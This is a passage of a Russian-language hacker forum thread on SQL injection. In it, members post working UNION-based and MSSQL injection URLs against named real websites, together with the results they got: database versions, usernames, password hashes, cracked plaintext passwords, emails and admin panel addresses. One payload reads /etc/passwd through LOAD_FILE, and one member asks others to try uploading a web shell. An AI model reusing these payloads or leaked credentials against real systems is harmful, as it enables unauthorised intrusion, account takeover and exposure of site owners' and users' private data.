SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.nzaf.org.nz/

    Code:
    http://www.nzaf.org.nz/articles.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),version(),database())+from+admin/*
    Осталось подобрать колонки в таблице admin...
     
  2. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.friarsgardens.co.nz/

    Code:
    http://www.friarsgardens.co.nz/garden.php?id=-1+union+select+1,concat_ws(0x3a,username,passwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+from+users/*
    admin:5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8
     
    1 person likes this.
  3. .Begemot.

    .Begemot. Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    148
    Likes Received:
    233
    Reputations:
    0
    unonamebel.ru

    HTML:
    http://www.unonamebel.ru/shop/?dir=1+union+select+0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7/*
    USER:uno_mebel@localhost
    VERSION:4.1.21-log
    DATABASE:db_uno_mebel
     
    3 people like this.
  4. 5taY3r

    5taY3r Elder - Старейшина

    Joined:
    10 May 2007
    Messages:
    38
    Likes Received:
    35
    Reputations:
    0
    www.welcomenet.ch
    Code:
    https://welcomenet.ch/onlinebooking/sites/angebotunddaten.php?hotelid=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+users/*
    4.0.18:root@localhost:welcodat
     
    1 person likes this.
  5. 159932

    159932 Elder - Старейшина

    Joined:
    28 Sep 2007
    Messages:
    587
    Likes Received:
    462
    Reputations:
    5
    5.0.32-Debian_7etch1-log
    admin:21232f297a57a5a743894a0e4a801fc3
    admin:admin
     
    1 person likes this.
  6. 5taY3r

    5taY3r Elder - Старейшина

    Joined:
    10 May 2007
    Messages:
    38
    Likes Received:
    35
    Reputations:
    0
    www.wichita.co.uk
    Code:
    http://www.wichita.co.uk/productdetails.php?id=-1+union+select+convert(concat_ws(0x3a,version(),user(),database())+using+latin1),2,3,4/*
    4.1.10a-standard-log:admin@localhost:wichita
     
  7. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    www.gramis.com

    www.gramis.com

    HTML:
    http://www.gramis.com/novina.php?id=-6+UNION+SELECT+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5/*
    4.1.22-log:gramis@localhost:gramis
    HTML:
    http://www.gramis.com/novina.php?id=-6+UNION+SELECT+1,2,3,concat(username,0x3a,password),5+FROM+users+LIMIT+0,1/*
    admin:babelfi67
    Админка:
    http://gramis.com/admin/index.php

    HTML:
    http://www.gramis.com/novina.php?id=-6+UNION+SELECT+1,2,3,concat(user_id,0x3a,username,0x3a,user_password,0x3a,user_icq),5+FROM+phpbb_users+LIMIT+1,1/*
    2:admin:f7c2d7fc1be27fcb6fc6d6dace13525e:::babelfi67
    Вход на форум:
    http://www.gramis.com/phpbb/login.php
     
    1 person likes this.
  8. sasTO

    sasTO Banned

    Joined:
    2 Aug 2007
    Messages:
    205
    Likes Received:
    230
    Reputations:
    14
    интересная скуль;)

    код:

    http://angara.ur.ru/?page=serv&id=-1014+union+select+1,2,concat(table_schema,0x3a,table_name,0x3a,column_name),4+from+information_schema.columns+where+column_name+like+0x257061737325+limit+0,1/*

    админских таблиц 116!!! шт.
    Кому интересно,делайте выводы ;)
     
    2 people like this.
  9. Roba

    Roba Banned

    Joined:
    24 Oct 2007
    Messages:
    237
    Likes Received:
    299
    Reputations:
    165
    versii.com.ua
    Code:
    http://versii.com.ua/telegraf/print.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9/*
    5.0.45-log:versii@localhost:versii

    Админка:
    Code:
    http://versii.com.ua/admin/
     
    4 people like this.
  10. je0n

    je0n Elder - Старейшина

    Joined:
    14 May 2006
    Messages:
    345
    Likes Received:
    96
    Reputations:
    41
    http://www.trinidadexpress.com/index.pl/article_news?id=161245965+UNION+SELECT+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32

    4.0.27-standard-log
    csite01@AdServNode1


    непонятная админка:

    http://admin.trinidadexpress.com/
    логин:пароль
    carlos:carlos
     
    1 person likes this.
  11. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    MySQL Injection:
    http://nashfilm.ru/index.php?option=rss_exporter&version=1&feed_id=-1+union+select+1,concat(user,password,host),3,4,5,6,7,8,9,10,11,12,13,concat(USER(),VERSION(),DATABASE()),15,16+FROM+mysql.user/*
    http://nashfilm.ru/index.php?option=rss_exporter&version=1&feed_id=-1+union+select+1,2,3,4,5,LOAD_FILE(char(47,101,116,99,47,112,97,115,115,119,100)),7,8,9,10,11,12,13,14,15,16/*
    http://www.catltd.ru/prices.html?cg=-1+UNION+SELECT+1,2,3,4,USER(),6,7/*
    БД 4, а жаль. Таблицы с лету подобрать не удалось. Если кто будет ковыряться, плиз отпишитесь о результатах :).

    MsSQL Injection:

    http://www.goodmoves.org.uk/findajob/findajobdet.asp?id=1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
     
    3 people like this.
  12. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    www.big6.com

    HTML:
    http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(version(),0x3a,user(),0x3a,database()),2,3,4,5/*
    5.0.37-log:big6@localhost:big6

    Интересные таблицы:
    wp_users
    poll_user
    customers
    blog_users


    Т.к. сейчас слишком поздно, какие из них фальшивые разбираться не стал:
    HTML:
    http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(ID,0x3a,user_login,0x3a,user_pass,0x3a,user_email),2,3,4,5+FROM+wp_users+LIMIT+1,1/*
    2:sue:e7e9ec3723447a642f762b2b6a15cfd7:[email protected]::bella
    ...
    HTML:
    http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(user_id,0x3a,username,0x3a,userpass),2,3,4,5+FROM+poll_user/*
    1:admin:d158b1d234953b66bfc119f17f800b7b::big6php
    HTML:
    http://www.big6.com/showarticle.php?id=-16+UNION+SELECT+concat(customers_id,0x3a,customers_email_address,0x3a,customers_password),2,3,4,5+FROM+customers/*
    1:root@localhost:d95e8fa7f20a009372eb3477473fcd34:1c::1cpassword

    P.S. С blog_users все то же самое, что и с wp_users =)
     
    #4292 ~EviL~, 3 Jan 2008
    Last edited: 3 Jan 2008
    3 people like this.
  13. Ded MustD!e

    Ded MustD!e Banned

    Joined:
    23 Aug 2007
    Messages:
    392
    Likes Received:
    694
    Reputations:
    405
    http://www.nram.org.nz/

    Code:
    http://www.nram.org.nz/record.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+USERS+limit+0,1/*
     
    4 people like this.
  14. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.blogi.moje.pl/kategor.php?id_kategori=-1+union+select+1,VERSION(),3,4,5,6,7/*
    Code:
    http://tibiacz.com/kategorie_predmet.php?kat=-1+union+select+1,2,3,4,concat_ws(0x203a20,table_name,column_name),6,7,8,9,10,11+from+information_schema.columns/*
    Code:
    http://www.cytaty.pl/wyslij.php?numer=0+union+select+1,VERSION(),3,4,5,6/*
    Code:
    http://opisygg.szabloniki.com/index.php?pokaz_opis=-3871+union+select+1,VERSION(),3,4,5,6/*
    Code:
    http://www.ggopis.info/opis.php?id=0+UNION+SELECT+1,2,3,4,5,6,7/*
    Code:
    http://www.foto.oaza.pl/pokaz.php?strona=1&id=-9+union+select+1,2,3,VERSION(),5,6,7,8,9,10,11,12/*
     
    #4294 SWAT, 3 Jan 2008
    Last edited: 3 Jan 2008
    3 people like this.
  15. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    moblog.co.uk

    Скрипт блога тоже бажный...
     
    5 people like this.
  16. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    http://www.rabota-enisey.ru/news/?article=-1+or+1=@@version--

    'Microsoft SQL Server 2000 - 8.00.818 (Intel X86) May 31 2003 16:08:15 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) '

    http://www.rabota-enisey.ru/news/?article=-1+or+1=(select+db_name())-- rabota-enisey.ru
    http://www.rabota-enisey.ru/news/?article=-1+or+1=(select+system_user)-- rabota-enisey_ru

    -----------------------------------------------------------------------------

    invest.trust.ru Инвестиционный банк «ТРАСТ»


    http://www.invest.trust.ru/about/press_centre/news/?id=-1+union+select+1,concat_ws(0x2F,version(),database(),user()),3,4,5,6,7,8,9/*

    5.0.22/trust_rus/trust_bank@localhost


    http://www.invest.trust.ru/about/press_centre/news/?id=-1+union+select+1,concat_ws(0x2F,users_login,users_password,users_Email),3,4,5,6,7,8,9+from+site_users+limit+0,1/*

    логин/хеш/мейл
    root/e6b764d1ce8aec819b8aeebb2c4f45db/

    Юзаем ANTICHAT ONLINE MD5 CRACK (http://md5.xek.cc/ ) получаем:

    e6b764d1ce8aec819b8aeebb2c4f45db - rjgtqrf76

    :)
     
    6 people like this.
  17. SWAT

    SWAT Elder - Старейшина

    Joined:
    14 Dec 2006
    Messages:
    198
    Likes Received:
    196
    Reputations:
    -7
    Code:
    http://www.ptgem.pl/pokaz.php?idz=-9+union+select+1,2,3,VERSION(),5,6,7/*
    Code:
    http://www.foto-akcesoria.com.pl/index.php?i=produkt&nr=-9+union+select+VERSION(),2,3/*
    Code:
    http://www.emmanuel.home.pl/index.php?lang=uk&url2=art&info=-999+union+select+1,2,3,version(),5,6,7/*
     
    #4297 SWAT, 3 Jan 2008
    Last edited: 3 Jan 2008
    2 people like this.
  18. ~EviL~

    ~EviL~ Elder - Старейшина

    Joined:
    14 Aug 2007
    Messages:
    169
    Likes Received:
    77
    Reputations:
    4
    www.slavishow.com

    HTML:
    http://www.slavishow.com/index.php?cat=1&mid=49+UNION+SELECT+1,concat(version(),0x3a,user(),0x3a,database()),3,4+LIMIT+170,2/*
    5.0.32-Debian_7etch3-log:web_user@localhost:slavishow_web

    HTML:
    http://www.slavishow.com/index.php?cat=1&mid=49+UNION+SELECT+1,concat(id,0x3a,name,0x3a,pass),3,4+FROM+slavishow_web.admins+LIMIT+170,4/*
    1:tester:09dc76b84e834f94643dde29695d28ec
    2:dani:b5284b4b124260044f1a640fd6494b3f
    3:joro:e10adc3949ba59abbe56e057f20f883e
    ::123456

    HTML:
    http://www.slavishow.com/index.php?cat=1&mid=49+UNION+SELECT+1,concat(user_id,0x3a,username,0x3a,user_password),3,4+FROM+db_Forum.tb_users+LIMIT+170,50/*
    2:Aleko:f02123067c08a29eb91a894af3493bc8
    3:darco:d8578edf8458ce06fbc5bb76a58c5ca4
    ::qwerty (админ) http://forum.slavishow.com/login.php
    ...

    HTML:
    http://www.slavishow.com/index.php?cat=1&mid=49+UNION+SELECT+1,concat(login,0x3a,password,0x3a,e_mail,0x3a,realname),3,4+FROM+db_Forum.chat_users+LIMIT+170,50/*
    chat_admin:wiesteludi:0: (админ) http://chat.slavishow.com/
    .SLAVI.:1:[email protected]:SLAVI
    ...
     
    4 people like this.
  19. sharoff

    sharoff Member

    Joined:
    5 Aug 2007
    Messages:
    25
    Likes Received:
    6
    Reputations:
    0
    админка
    Шелл залить не удалось, кому удастся напишите в асю.
     
  20. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    Одежда от Savage Ксения Собчак итд xD

    Единственное нарыл в users Marius:faktorius админку не нашёл

    admin:rfnz(админка(http://www.dm-centre.ru/admin.php))
    ADMINer:9183f254e874a7ae034e68fd9f2053e1(форум)
     
    #4300 ILYAtirtir, 3 Jan 2008
    Last edited: 3 Jan 2008
    3 people like this.
Thread Status:
Not open for further replies.